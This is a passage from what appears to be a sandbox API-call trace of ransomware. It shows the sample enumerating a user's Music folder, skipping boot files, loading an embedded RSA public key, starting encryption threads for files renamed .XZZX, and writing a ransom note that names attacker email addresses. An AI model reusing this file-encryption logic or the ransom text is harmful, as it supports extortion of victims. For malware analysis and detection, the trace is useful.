lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4f4 [0114.932] Sleep (dwMilliseconds=0x96) [0115.086] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0115.086] lstrcmpW (lpString1="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpString2="..") returned 1 [0115.086] lstrcmpW (lpString1="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpString2=".") returned 1 [0115.087] StrStrW (lpFirst="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0115.087] StrStrW (lpFirst="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpSrch="ntldr") returned 0x0 [0115.087] StrStrW (lpFirst="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpSrch="NTLDR") returned 0x0 [0115.087] StrStrW (lpFirst="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0115.087] StrStrW (lpFirst="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0115.087] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0115.087] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0115.087] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0115.087] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0115.087] lstrcpyW (in: lpString1=0x17cf1c, lpString2="FCD862501902E584E01CEFE81DABC9CC.XZZX" | out: lpString1="FCD862501902E584E01CEFE81DABC9CC.XZZX") returned="FCD862501902E584E01CEFE81DABC9CC.XZZX" [0115.087] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0115.087] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4f8 [0115.087] Sleep (dwMilliseconds=0x96) [0115.242] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0115.242] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0115.242] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0115.242] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0115.243] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0115.243] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 1 [0115.243] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 0 [0115.243] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0115.243] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0115.243] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0115.243] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0115.243] SetErrorMode (uMode=0x1) returned 0x1 [0115.243] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_HELP_INSTRUCTION.TXT") returned 57 [0115.243] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0115.243] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0115.243] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x4fc) returned 0x0 [0115.244] RegQueryValueExW (in: hKey=0x4fc, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cbbd00, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cbbd00*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0115.244] RegCloseKey (hKey=0x4fc) returned 0x0 [0115.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0115.244] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0115.244] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4fc [0115.245] CloseHandle (hObject=0x4fc) returned 1 [0115.245] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a55d0 [0115.245] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="Music" [0115.245] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Music" | out: lpString1="Music") returned="Music" [0115.245] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0115.246] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0115.246] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0115.246] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0115.246] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0115.246] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0115.246] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0115.246] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0115.246] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0115.246] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0115.246] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0115.246] lstrcmpW (lpString1="auOsV3M 9VtNbJuKze", lpString2="..") returned 1 [0115.246] lstrcmpW (lpString1="auOsV3M 9VtNbJuKze", lpString2=".") returned 1 [0115.246] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0115.246] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0115.246] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="auOsV3M 9VtNbJuKze" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" [0115.246] SetErrorMode (uMode=0x1) returned 0x1 [0115.246] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" [0115.246] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0115.246] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0115.246] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*" [0115.246] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3a5590 [0115.247] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="auOsV3M 9VtNbJuKze" [0115.247] lstrcpyW (in: lpString1=0x17b644, lpString2="auOsV3M 9VtNbJuKze" | out: lpString1="auOsV3M 9VtNbJuKze") returned="auOsV3M 9VtNbJuKze" [0115.247] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0115.247] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0115.247] lstrcmpW (lpString1="1037641408F8F044B7533AA10D10D48C.XZZX", lpString2="..") returned 1 [0115.247] lstrcmpW (lpString1="1037641408F8F044B7533AA10D10D48C.XZZX", lpString2=".") returned 1 [0115.247] StrStrW (lpFirst="1037641408F8F044B7533AA10D10D48C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0115.248] StrStrW (lpFirst="1037641408F8F044B7533AA10D10D48C.XZZX", lpSrch="ntldr") returned 0x0 [0115.248] StrStrW (lpFirst="1037641408F8F044B7533AA10D10D48C.XZZX", lpSrch="NTLDR") returned 0x0 [0115.248] StrStrW (lpFirst="1037641408F8F044B7533AA10D10D48C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0115.248] StrStrW (lpFirst="1037641408F8F044B7533AA10D10D48C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0115.248] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0115.248] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0115.248] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0115.248] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0115.248] lstrcpyW (in: lpString1=0x17be7c, lpString2="1037641408F8F044B7533AA10D10D48C.XZZX" | out: lpString1="1037641408F8F044B7533AA10D10D48C.XZZX") returned="1037641408F8F044B7533AA10D10D48C.XZZX" [0115.248] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0115.248] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x504 [0115.248] WaitForSingleObject (hHandle=0x504, dwMilliseconds=0xffffffff) returned 0x0 [0115.249] Sleep (dwMilliseconds=0x96) [0115.398] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0115.399] lstrcmpW (lpString1="2--S BWBtG7 nG.mp3", lpString2="..") returned 1 [0115.399] lstrcmpW (lpString1="2--S BWBtG7 nG.mp3", lpString2=".") returned 1 [0115.399] StrStrW (lpFirst="2--S BWBtG7 nG.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0115.399] StrStrW (lpFirst="2--S BWBtG7 nG.mp3", lpSrch="ntldr") returned 0x0 [0115.399] StrStrW (lpFirst="2--S BWBtG7 nG.mp3", lpSrch="NTLDR") returned 0x0 [0115.399] StrStrW (lpFirst="2--S BWBtG7 nG.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0115.399] StrStrW (lpFirst="2--S BWBtG7 nG.mp3", lpSrch="ntdetect.com") returned 0x0 [0115.399] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0115.399] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0115.399] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0115.399] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0115.399] lstrcpyW (in: lpString1=0x17be7c, lpString2="2--S BWBtG7 nG.mp3" | out: lpString1="2--S BWBtG7 nG.mp3") returned="2--S BWBtG7 nG.mp3" [0115.399] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0115.399] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x508 [0115.400] Sleep (dwMilliseconds=0x96) [0115.586] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0115.586] lstrcmpW (lpString1="23947E243409DC7CAF2C62063821C0C4.XZZX", lpString2="..") returned 1 [0115.586] lstrcmpW (lpString1="23947E243409DC7CAF2C62063821C0C4.XZZX", lpString2=".") returned 1 [0115.586] StrStrW (lpFirst="23947E243409DC7CAF2C62063821C0C4.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0115.586] StrStrW (lpFirst="23947E243409DC7CAF2C62063821C0C4.XZZX", lpSrch="ntldr") returned 0x0 [0115.586] StrStrW (lpFirst="23947E243409DC7CAF2C62063821C0C4.XZZX", lpSrch="NTLDR") returned 0x0 [0115.586] StrStrW (lpFirst="23947E243409DC7CAF2C62063821C0C4.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0115.586] StrStrW (lpFirst="23947E243409DC7CAF2C62063821C0C4.XZZX", lpSrch="ntdetect.com") returned 0x0 [0115.587] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0115.587] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0115.587] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0115.587] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0115.587] lstrcpyW (in: lpString1=0x17be7c, lpString2="23947E243409DC7CAF2C62063821C0C4.XZZX" | out: lpString1="23947E243409DC7CAF2C62063821C0C4.XZZX") returned="23947E243409DC7CAF2C62063821C0C4.XZZX" [0115.587] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0115.587] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x50c [0115.587] Sleep (dwMilliseconds=0x96) [0115.742] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0115.742] lstrcmpW (lpString1="51A5A3C031894064FCB3CED0366624AC.XZZX", lpString2="..") returned 1 [0115.742] lstrcmpW (lpString1="51A5A3C031894064FCB3CED0366624AC.XZZX", lpString2=".") returned 1 [0115.742] StrStrW (lpFirst="51A5A3C031894064FCB3CED0366624AC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0115.742] StrStrW (lpFirst="51A5A3C031894064FCB3CED0366624AC.XZZX", lpSrch="ntldr") returned 0x0 [0115.742] StrStrW (lpFirst="51A5A3C031894064FCB3CED0366624AC.XZZX", lpSrch="NTLDR") returned 0x0 [0115.742] StrStrW (lpFirst="51A5A3C031894064FCB3CED0366624AC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0115.742] StrStrW (lpFirst="51A5A3C031894064FCB3CED0366624AC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0115.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0115.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0115.742] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0115.742] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0115.742] lstrcpyW (in: lpString1=0x17be7c, lpString2="51A5A3C031894064FCB3CED0366624AC.XZZX" | out: lpString1="51A5A3C031894064FCB3CED0366624AC.XZZX") returned="51A5A3C031894064FCB3CED0366624AC.XZZX" [0115.742] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0115.742] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, 